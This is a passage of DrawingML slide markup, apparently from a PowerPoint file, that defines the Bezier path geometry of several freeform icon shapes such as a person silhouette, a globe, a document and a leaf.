                <a:ext cx="279899" cy="268153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 88"/>
                  <a:gd name="T1" fmla="*/ 59 h 84"/>
                  <a:gd name="T2" fmla="*/ 53 w 88"/>
                  <a:gd name="T3" fmla="*/ 53 h 84"/>
                  <a:gd name="T4" fmla="*/ 61 w 88"/>
                  <a:gd name="T5" fmla="*/ 38 h 84"/>
                  <a:gd name="T6" fmla="*/ 63 w 88"/>
                  <a:gd name="T7" fmla="*/ 26 h 84"/>
                  <a:gd name="T8" fmla="*/ 44 w 88"/>
                  <a:gd name="T9" fmla="*/ 0 h 84"/>
                  <a:gd name="T10" fmla="*/ 25 w 88"/>
                  <a:gd name="T11" fmla="*/ 26 h 84"/>
                  <a:gd name="T12" fmla="*/ 28 w 88"/>
                  <a:gd name="T13" fmla="*/ 38 h 84"/>
                  <a:gd name="T14" fmla="*/ 36 w 88"/>
                  <a:gd name="T15" fmla="*/ 53 h 84"/>
                  <a:gd name="T16" fmla="*/ 33 w 88"/>
                  <a:gd name="T17" fmla="*/ 59 h 84"/>
                  <a:gd name="T18" fmla="*/ 0 w 88"/>
                  <a:gd name="T19" fmla="*/ 84 h 84"/>
                  <a:gd name="T20" fmla="*/ 44 w 88"/>
                  <a:gd name="T21" fmla="*/ 84 h 84"/>
                  <a:gd name="T22" fmla="*/ 88 w 88"/>
                  <a:gd name="T23" fmla="*/ 84 h 84"/>
                  <a:gd name="T24" fmla="*/ 55 w 88"/>
                  <a:gd name="T25" fmla="*/ 59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84">
                    <a:moveTo>
                      <a:pt x="55" y="59"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="59"/>
                      <a:pt x="53" y="53"/>
                      <a:pt x="53" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="53"/>
                      <a:pt x="59" y="46"/>
                      <a:pt x="61" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="38"/>
                      <a:pt x="67" y="29"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="22"/>
                      <a:pt x="68" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="0"/>
                      <a:pt x="25" y="22"/>
                      <a:pt x="25" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="29"/>
                      <a:pt x="24" y="38"/>
                      <a:pt x="28" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="46"/>
                      <a:pt x="36" y="53"/>
                      <a:pt x="36" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="53"/>
                      <a:pt x="35" y="59"/>
                      <a:pt x="33" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="60"/>
                      <a:pt x="0" y="72"/>
                      <a:pt x="0" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="84"/>
                      <a:pt x="44" y="84"/>
                      <a:pt x="44" y="84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8" y="72"/>
                      <a:pt x="62" y="60"/>
                      <a:pt x="55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0" name="Freeform 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3887E6C-2BD2-458F-A200-C47E9B05ABE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9097" y="4581732"/>
                <a:ext cx="262282" cy="262282"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 82"/>
                  <a:gd name="T1" fmla="*/ 41 h 82"/>
                  <a:gd name="T2" fmla="*/ 82 w 82"/>
                  <a:gd name="T3" fmla="*/ 41 h 82"/>
                  <a:gd name="T4" fmla="*/ 64 w 82"/>
                  <a:gd name="T5" fmla="*/ 55 h 82"/>
                  <a:gd name="T6" fmla="*/ 77 w 82"/>
                  <a:gd name="T7" fmla="*/ 44 h 82"/>
                  <a:gd name="T8" fmla="*/ 64 w 82"/>
                  <a:gd name="T9" fmla="*/ 55 h 82"/>
                  <a:gd name="T10" fmla="*/ 16 w 82"/>
                  <a:gd name="T11" fmla="*/ 38 h 82"/>
                  <a:gd name="T12" fmla="*/ 8 w 82"/>
                  <a:gd name="T13" fmla="*/ 27 h 82"/>
                  <a:gd name="T14" fmla="*/ 59 w 82"/>
                  <a:gd name="T15" fmla="*/ 27 h 82"/>
                  <a:gd name="T16" fmla="*/ 44 w 82"/>
                  <a:gd name="T17" fmla="*/ 38 h 82"/>
                  <a:gd name="T18" fmla="*/ 59 w 82"/>
                  <a:gd name="T19" fmla="*/ 27 h 82"/>
                  <a:gd name="T20" fmla="*/ 44 w 82"/>
                  <a:gd name="T21" fmla="*/ 5 h 82"/>
                  <a:gd name="T22" fmla="*/ 54 w 82"/>
                  <a:gd name="T23" fmla="*/ 14 h 82"/>
                  <a:gd name="T24" fmla="*/ 44 w 82"/>
                  <a:gd name="T25" fmla="*/ 22 h 82"/>
                  <a:gd name="T26" fmla="*/ 35 w 82"/>
                  <a:gd name="T27" fmla="*/ 7 h 82"/>
                  <a:gd name="T28" fmla="*/ 38 w 82"/>
                  <a:gd name="T29" fmla="*/ 22 h 82"/>
                  <a:gd name="T30" fmla="*/ 28 w 82"/>
                  <a:gd name="T31" fmla="*/ 14 h 82"/>
                  <a:gd name="T32" fmla="*/ 38 w 82"/>
                  <a:gd name="T33" fmla="*/ 38 h 82"/>
                  <a:gd name="T34" fmla="*/ 23 w 82"/>
                  <a:gd name="T35" fmla="*/ 27 h 82"/>
                  <a:gd name="T36" fmla="*/ 8 w 82"/>
                  <a:gd name="T37" fmla="*/ 55 h 82"/>
                  <a:gd name="T38" fmla="*/ 16 w 82"/>
                  <a:gd name="T39" fmla="*/ 44 h 82"/>
                  <a:gd name="T40" fmla="*/ 8 w 82"/>
                  <a:gd name="T41" fmla="*/ 55 h 82"/>
                  <a:gd name="T42" fmla="*/ 38 w 82"/>
                  <a:gd name="T43" fmla="*/ 44 h 82"/>
                  <a:gd name="T44" fmla="*/ 23 w 82"/>
                  <a:gd name="T45" fmla="*/ 55 h 82"/>
                  <a:gd name="T46" fmla="*/ 38 w 82"/>
                  <a:gd name="T47" fmla="*/ 60 h 82"/>
                  <a:gd name="T48" fmla="*/ 35 w 82"/>
                  <a:gd name="T49" fmla="*/ 74 h 82"/>
                  <a:gd name="T50" fmla="*/ 25 w 82"/>
                  <a:gd name="T51" fmla="*/ 60 h 82"/>
                  <a:gd name="T52" fmla="*/ 54 w 82"/>
                  <a:gd name="T53" fmla="*/ 67 h 82"/>
                  <a:gd name="T54" fmla="*/ 44 w 82"/>
                  <a:gd name="T55" fmla="*/ 76 h 82"/>
                  <a:gd name="T56" fmla="*/ 57 w 82"/>
                  <a:gd name="T57" fmla="*/ 60 h 82"/>
                  <a:gd name="T58" fmla="*/ 44 w 82"/>
                  <a:gd name="T59" fmla="*/ 55 h 82"/>
                  <a:gd name="T60" fmla="*/ 60 w 82"/>
                  <a:gd name="T61" fmla="*/ 44 h 82"/>
                  <a:gd name="T62" fmla="*/ 44 w 82"/>
                  <a:gd name="T63" fmla="*/ 55 h 82"/>
                  <a:gd name="T64" fmla="*/ 64 w 82"/>
                  <a:gd name="T65" fmla="*/ 27 h 82"/>
                  <a:gd name="T66" fmla="*/ 77 w 82"/>
                  <a:gd name="T67" fmla="*/ 38 h 82"/>
                  <a:gd name="T68" fmla="*/ 71 w 82"/>
                  <a:gd name="T69" fmla="*/ 22 h 82"/>
                  <a:gd name="T70" fmla="*/ 57 w 82"/>
                  <a:gd name="T71" fmla="*/ 9 h 82"/>
                  <a:gd name="T72" fmla="*/ 71 w 82"/>
                  <a:gd name="T73" fmla="*/ 22 h 82"/>
                  <a:gd name="T74" fmla="*/ 26 w 82"/>
                  <a:gd name="T75" fmla="*/ 9 h 82"/>
                  <a:gd name="T76" fmla="*/ 11 w 82"/>
                  <a:gd name="T77" fmla="*/ 22 h 82"/>
                  <a:gd name="T78" fmla="*/ 11 w 82"/>
                  <a:gd name="T79" fmla="*/ 60 h 82"/>
                  <a:gd name="T80" fmla="*/ 26 w 82"/>
                  <a:gd name="T81" fmla="*/ 73 h 82"/>
                  <a:gd name="T82" fmla="*/ 11 w 82"/>
                  <a:gd name="T83" fmla="*/ 60 h 82"/>
                  <a:gd name="T84" fmla="*/ 57 w 82"/>
                  <a:gd name="T85" fmla="*/ 73 h 82"/>
                  <a:gd name="T86" fmla="*/ 71 w 82"/>
                  <a:gd name="T87" fmla="*/ 6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2" h="82">
                    <a:moveTo>
                      <a:pt x="41" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="0"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="0" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="64"/>
                      <a:pt x="18" y="82"/>
                      <a:pt x="41" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="82"/>
                      <a:pt x="82" y="64"/>
                      <a:pt x="82" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="18"/>
                      <a:pt x="64" y="0"/>
                      <a:pt x="41" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="64" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="51"/>
                      <a:pt x="66" y="47"/>
                      <a:pt x="66" y="44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6" y="47"/>
                      <a:pt x="76" y="51"/>
                      <a:pt x="74" y="55"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="18" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="31"/>
                      <a:pt x="17" y="34"/>
                      <a:pt x="16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34"/>
                      <a:pt x="7" y="31"/>
                      <a:pt x="8" y="27"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18" y="27"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="59" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="31"/>
                      <a:pt x="60" y="34"/>
                      <a:pt x="60" y="38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44" y="27"/>
                      <a:pt x="44" y="27"/>
                      <a:pt x="44" y="27"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="59" y="27"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="44" y="22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45" y="6"/>
                      <a:pt x="46" y="6"/>
                      <a:pt x="48" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="9"/>
                      <a:pt x="52" y="11"/>
                      <a:pt x="54" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="17"/>
                      <a:pt x="56" y="19"/>
                      <a:pt x="57" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="22"/>
                      <a:pt x="44" y="22"/>
                      <a:pt x="44" y="22"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="28" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="11"/>
                      <a:pt x="32" y="9"/>
                      <a:pt x="35" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="6"/>
                      <a:pt x="37" y="6"/>
                      <a:pt x="38" y="5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19"/>
                      <a:pt x="27" y="17"/>
                      <a:pt x="28" y="14"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="38"/>
                      <a:pt x="38" y="38"/>
                      <a:pt x="38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4"/>
                      <a:pt x="23" y="31"/>
                      <a:pt x="23" y="27"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38" y="27"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="51"/>
                      <a:pt x="6" y="47"/>
                      <a:pt x="6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7" y="47"/>
                      <a:pt x="17" y="51"/>
                      <a:pt x="18" y="55"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="22" y="44"/>
                    </a:move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55"/>
                      <a:pt x="38" y="55"/>
                      <a:pt x="38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1"/>
                      <a:pt x="22" y="47"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="76"/>
                      <a:pt x="38" y="76"/>
                      <a:pt x="38" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="76"/>
                      <a:pt x="36" y="75"/>
                      <a:pt x="35" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="73"/>
                      <a:pt x="30" y="70"/>
                      <a:pt x="28" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="65"/>
                      <a:pt x="26" y="63"/>
                      <a:pt x="25" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="60"/>
                      <a:pt x="38" y="60"/>
                      <a:pt x="38" y="60"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="70"/>
                      <a:pt x="50" y="73"/>
                      <a:pt x="48" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="75"/>
                      <a:pt x="45" y="76"/>
                      <a:pt x="44" y="7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6" y="63"/>
                      <a:pt x="55" y="65"/>
                      <a:pt x="54" y="67"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="44" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="44"/>
                      <a:pt x="44" y="44"/>
                      <a:pt x="44" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="44"/>
                      <a:pt x="60" y="44"/>
                      <a:pt x="60" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="47"/>
                      <a:pt x="60" y="51"/>
                      <a:pt x="59" y="55"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="66" y="38"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="34"/>
                      <a:pt x="65" y="31"/>
                      <a:pt x="64" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="27"/>
                      <a:pt x="74" y="27"/>
                      <a:pt x="74" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="31"/>
                      <a:pt x="76" y="34"/>
                      <a:pt x="77" y="38"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="66" y="38"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="22"/>
                    </a:move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17"/>
                      <a:pt x="59" y="12"/>
                      <a:pt x="57" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="10"/>
                      <a:pt x="63" y="13"/>
                      <a:pt x="66" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="17"/>
                      <a:pt x="70" y="19"/>
                      <a:pt x="71" y="22"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="13"/>
                      <a:pt x="22" y="10"/>
                      <a:pt x="26" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="12"/>
                      <a:pt x="21" y="17"/>
                      <a:pt x="19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2" y="19"/>
                      <a:pt x="14" y="17"/>
                      <a:pt x="16" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="60"/>
                      <a:pt x="19" y="60"/>
                      <a:pt x="19" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="65"/>
                      <a:pt x="23" y="69"/>
                      <a:pt x="26" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="71"/>
                      <a:pt x="19" y="69"/>
                      <a:pt x="16" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="64"/>
                      <a:pt x="12" y="62"/>
                      <a:pt x="11" y="60"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="66" y="66"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="69"/>
                      <a:pt x="60" y="71"/>
                      <a:pt x="57" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="69"/>
                      <a:pt x="61" y="65"/>
                      <a:pt x="63" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="60"/>
                      <a:pt x="71" y="60"/>
                      <a:pt x="71" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="62"/>
                      <a:pt x="68" y="64"/>
                      <a:pt x="6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1" name="Freeform 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A73A55B-25F0-44D9-AAB1-BAE1AE3F20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20072" y="2931705"/>
                <a:ext cx="219221" cy="232921"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 69"/>
                  <a:gd name="T1" fmla="*/ 0 h 73"/>
                  <a:gd name="T2" fmla="*/ 7 w 69"/>
                  <a:gd name="T3" fmla="*/ 0 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 69"/>
                  <a:gd name="T5" fmla="*/ 7 h 73"/>
                  <a:gd name="T6" fmla="*/ 0 w 69"/>
                  <a:gd name="T7" fmla="*/ 66 h 73"/>
                  <a:gd name="T8" fmla="*/ 7 w 69"/>
                  <a:gd name="T9" fmla="*/ 73 h 73"/>
                  <a:gd name="T10" fmla="*/ 62 w 69"/>
                  <a:gd name="T11" fmla="*/ 73 h 73"/>
                  <a:gd name="T12" fmla="*/ 69 w 69"/>
                  <a:gd name="T13" fmla="*/ 66 h 73"/>
                  <a:gd name="T14" fmla="*/ 69 w 69"/>
                  <a:gd name="T15" fmla="*/ 7 h 73"/>
                  <a:gd name="T16" fmla="*/ 62 w 69"/>
                  <a:gd name="T17" fmla="*/ 0 h 73"/>
                  <a:gd name="T18" fmla="*/ 60 w 69"/>
                  <a:gd name="T19" fmla="*/ 64 h 73"/>
                  <a:gd name="T20" fmla="*/ 10 w 69"/>
                  <a:gd name="T21" fmla="*/ 64 h 73"/>
                  <a:gd name="T22" fmla="*/ 10 w 69"/>
                  <a:gd name="T23" fmla="*/ 9 h 73"/>
                  <a:gd name="T24" fmla="*/ 60 w 69"/>
                  <a:gd name="T25" fmla="*/ 9 h 73"/>
                  <a:gd name="T26" fmla="*/ 60 w 69"/>
                  <a:gd name="T27" fmla="*/ 64 h 73"/>
                  <a:gd name="T28" fmla="*/ 19 w 69"/>
                  <a:gd name="T29" fmla="*/ 32 h 73"/>
                  <a:gd name="T30" fmla="*/ 51 w 69"/>
                  <a:gd name="T31" fmla="*/ 32 h 73"/>
                  <a:gd name="T32" fmla="*/ 51 w 69"/>
                  <a:gd name="T33" fmla="*/ 37 h 73"/>
                  <a:gd name="T34" fmla="*/ 19 w 69"/>
                  <a:gd name="T35" fmla="*/ 37 h 73"/>
                  <a:gd name="T36" fmla="*/ 19 w 69"/>
                  <a:gd name="T37" fmla="*/ 32 h 73"/>
                  <a:gd name="T38" fmla="*/ 19 w 69"/>
                  <a:gd name="T39" fmla="*/ 41 h 73"/>
                  <a:gd name="T40" fmla="*/ 51 w 69"/>
                  <a:gd name="T41" fmla="*/ 41 h 73"/>
                  <a:gd name="T42" fmla="*/ 51 w 69"/>
                  <a:gd name="T43" fmla="*/ 46 h 73"/>
                  <a:gd name="T44" fmla="*/ 19 w 69"/>
                  <a:gd name="T45" fmla="*/ 46 h 73"/>
                  <a:gd name="T46" fmla="*/ 19 w 69"/>
                  <a:gd name="T47" fmla="*/ 41 h 73"/>
                  <a:gd name="T48" fmla="*/ 19 w 69"/>
                  <a:gd name="T49" fmla="*/ 50 h 73"/>
                  <a:gd name="T50" fmla="*/ 51 w 69"/>
                  <a:gd name="T51" fmla="*/ 50 h 73"/>
                  <a:gd name="T52" fmla="*/ 51 w 69"/>
                  <a:gd name="T53" fmla="*/ 55 h 73"/>
                  <a:gd name="T54" fmla="*/ 19 w 69"/>
                  <a:gd name="T55" fmla="*/ 55 h 73"/>
                  <a:gd name="T56" fmla="*/ 19 w 69"/>
                  <a:gd name="T57" fmla="*/ 50 h 73"/>
                  <a:gd name="T58" fmla="*/ 19 w 69"/>
                  <a:gd name="T59" fmla="*/ 23 h 73"/>
                  <a:gd name="T60" fmla="*/ 51 w 69"/>
                  <a:gd name="T61" fmla="*/ 23 h 73"/>
                  <a:gd name="T62" fmla="*/ 51 w 69"/>
                  <a:gd name="T63" fmla="*/ 27 h 73"/>
                  <a:gd name="T64" fmla="*/ 19 w 69"/>
                  <a:gd name="T65" fmla="*/ 27 h 73"/>
                  <a:gd name="T66" fmla="*/ 19 w 69"/>
                  <a:gd name="T67" fmla="*/ 2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" h="73">
                    <a:moveTo>
                      <a:pt x="6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70"/>
                      <a:pt x="4" y="73"/>
                      <a:pt x="7" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="73"/>
                      <a:pt x="62" y="73"/>
                      <a:pt x="62" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="73"/>
                      <a:pt x="69" y="70"/>
                      <a:pt x="69" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="7"/>
                      <a:pt x="69" y="7"/>
                      <a:pt x="69" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="3"/>
                      <a:pt x="66" y="0"/>
                      <a:pt x="62" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="60" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="64"/>
                      <a:pt x="10" y="64"/>
                      <a:pt x="10" y="64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60" y="9"/>
                      <a:pt x="60" y="9"/>
                      <a:pt x="60" y="9"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="60" y="64"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="32"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="32"/>
                      <a:pt x="51" y="32"/>
                      <a:pt x="51" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="37"/>
                      <a:pt x="51" y="37"/>
                      <a:pt x="51" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="37"/>
                      <a:pt x="19" y="37"/>
                      <a:pt x="19" y="37"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="41"/>
                      <a:pt x="51" y="41"/>
                      <a:pt x="51" y="41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19" y="46"/>
                      <a:pt x="19" y="46"/>
                      <a:pt x="19" y="46"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19" y="41"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="50"/>
                    </a:move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19" y="55"/>
                      <a:pt x="19" y="55"/>
                      <a:pt x="19" y="55"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19" y="50"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="23"/>
                    </a:move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19" y="27"/>
                      <a:pt x="19" y="27"/>
                      <a:pt x="19" y="27"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19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2" name="Freeform 157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4724ABB1-5C21-4A9C-A8B3-5164C1AB9B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98188" y="1536129"/>
                <a:ext cx="242709" cy="281855"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 76"/>
                  <a:gd name="T1" fmla="*/ 0 h 88"/>
                  <a:gd name="T2" fmla="*/ 14 w 76"/>
                  <a:gd name="T3" fmla="*/ 28 h 88"/>
                  <a:gd name="T4" fmla="*/ 17 w 76"/>
                  <a:gd name="T5" fmla="*/ 65 h 88"/>
                  <a:gd name="T6" fmla="*/ 49 w 76"/>
                  <a:gd name="T7" fmla="*/ 27 h 88"/>
                  <a:gd name="T8" fmla="*/ 33 w 76"/>
                  <a:gd name="T9" fmla="*/ 74 h 88"/>
                  <a:gd name="T10" fmla="*/ 70 w 76"/>
                  <a:gd name="T11" fmla="*/ 57 h 88"/>
                  <a:gd name="T12" fmla="*/ 54 w 76"/>
                  <a:gd name="T13" fmla="*/ 0 h 88"/>
                  <a:gd name="T14" fmla="*/ 4 w 76"/>
                  <a:gd name="T15" fmla="*/ 78 h 88"/>
                  <a:gd name="T16" fmla="*/ 10 w 76"/>
                  <a:gd name="T17" fmla="*/ 83 h 88"/>
                  <a:gd name="T18" fmla="*/ 47 w 76"/>
                  <a:gd name="T19" fmla="*/ 41 h 88"/>
                  <a:gd name="T20" fmla="*/ 4 w 76"/>
                  <a:gd name="T21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88">
                    <a:moveTo>
                      <a:pt x="54" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="23"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="14" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42"/>
                      <a:pt x="5" y="59"/>
                      <a:pt x="17" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="59"/>
                      <a:pt x="40" y="46"/>
                      <a:pt x="49" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="27"/>
                      <a:pt x="57" y="51"/>
                      <a:pt x="33" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="88"/>
                      <a:pt x="64" y="79"/>
                      <a:pt x="70" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="33"/>
                      <a:pt x="60" y="9"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="4" y="78"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="78"/>
                      <a:pt x="5" y="83"/>
                      <a:pt x="10" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="83"/>
                      <a:pt x="36" y="71"/>
                      <a:pt x="47" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="70"/>
                      <a:pt x="6" y="78"/>
                      <a:pt x="4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3" name="Freeform 158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD8D518-EA74-42D2-B754-04693E48D5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85015" y="3366232"/>
                <a:ext cx="246623" cy="246623"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 77"/>
                  <a:gd name="T1" fmla="*/ 30 h 77"/>
                  <a:gd name="T2" fmla="*/ 25 w 77"/>
                  <a:gd name="T3" fmla="*/ 2 h 77"/>
                  <a:gd name="T4" fmla="*/ 38 w 77"/>
                  <a:gd name="T5" fmla="*/ 0 h 77"/>
                  <a:gd name="T6" fmla="*/ 53 w 77"/>
                  <a:gd name="T7" fmla="*/ 3 h 77"/>
                  <a:gd name="T8" fmla="*/ 53 w 77"/>
                  <a:gd name="T9" fmla="*/ 30 h 77"/>
